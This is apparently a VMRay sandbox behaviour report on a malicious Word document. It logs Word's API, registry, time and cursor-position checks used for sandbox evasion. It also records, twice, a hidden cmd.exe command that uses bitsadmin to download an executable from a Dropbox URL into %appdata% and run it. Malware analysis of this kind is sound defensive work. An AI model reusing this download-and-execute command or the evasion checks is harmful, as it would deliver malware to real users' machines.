Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | Sequential Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:08, Reason: Analysis Target |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:10:05 |
| Information | Value |
|---|---|
| PID | 0x954 |
| Parent PID | 0x584 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9CC
0x
9C8
0x
9C0
0x
9AC
0x
99C
0x
994
0x
990
0x
958
0x
9F8
0x
9FC
0x
A00
0x
A04
0x
A08
0x
A0C
0x
A4C
0x
A58
0x
714
0x
93C
0x
8F8
0x
124
0x
924
0x
B04
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = Unknown module name, base_address = 0x7fef8cd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef8d51618 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef8d4f088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee3560000 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x76e70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e894f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e85f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e82b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76e7ab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e85c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76e7a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76e7a5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x7feff1c0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feff1c2270 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feff1ca550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feff2520d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feff24dbd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feff1c5c90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feff1c6330 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feff1e66c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feff1c4710 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feff1c48f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feff1fb640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feff1fb360 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feff202640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feff1e58a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feff1e5820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feff1faf20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feff252160 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feff1e5a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feff1e5a30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feff1c60b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feff219f80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x7feff249b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feff249aa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feff249990 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feff249890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feff249770 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feff22b8d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x7feff22b800 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x7feff2448e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x7feff249470 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x7feff2496a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x7feff242fe0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x7feff249cf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x7feff248ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x7feff249c00 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x7feff248e60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x7feff243690 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x7feff2492d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x7feff242e80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x7feff243f90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x7feff2491a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x7feff227c30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x7feff227a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x7feff227890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x7feff227ea0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x7feff249600 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x7feff2276a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7feff2483f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feff1f3070 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feff1fd700 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feff1fd890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feff1dcaf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feff1e8a00 |
|
1 | |
| Module | Get Handle | module_name = ole32.dll, base_address = 0x7fefe810000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7fefe81de90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-01-10 10:49:07 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 139, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee356f200 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-01-10 10:49:07 (Local Time) |
|
2 | |
| System | Get Cursor | x_out = 777, y_out = 852 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-01-10 10:49:07 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-01-10 10:49:07 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 777, y_out = 852 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-01-10 10:49:07 (Local Time) |
|
7 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c |
|
1 | |
| Process | Create | process_name = cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe", os_pid = 0xa50, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Window | Create | - |
|
1 | |
| System | Get Cursor | x_out = 897, y_out = 514 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Ticks, time = 295902 |
|
9 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 600, address_out = 0x7fef0d9c6fc |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 595, address_out = 0x7fef0f94a40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fef0ddfe60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 516, address_out = 0x7fef0de17b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fef0de142c |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:17, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:09:56 |
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0x954 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A54
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-01-10 10:49:07 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 83741 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4ab20000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76f86d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76f823d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76f78290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76f817e0 |
|
1 | |
| Environment | Get Environment String | name = appdata, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\waitfor.exe, os_pid = 0xa6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\bitsadmin.exe, os_pid = 0xa90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
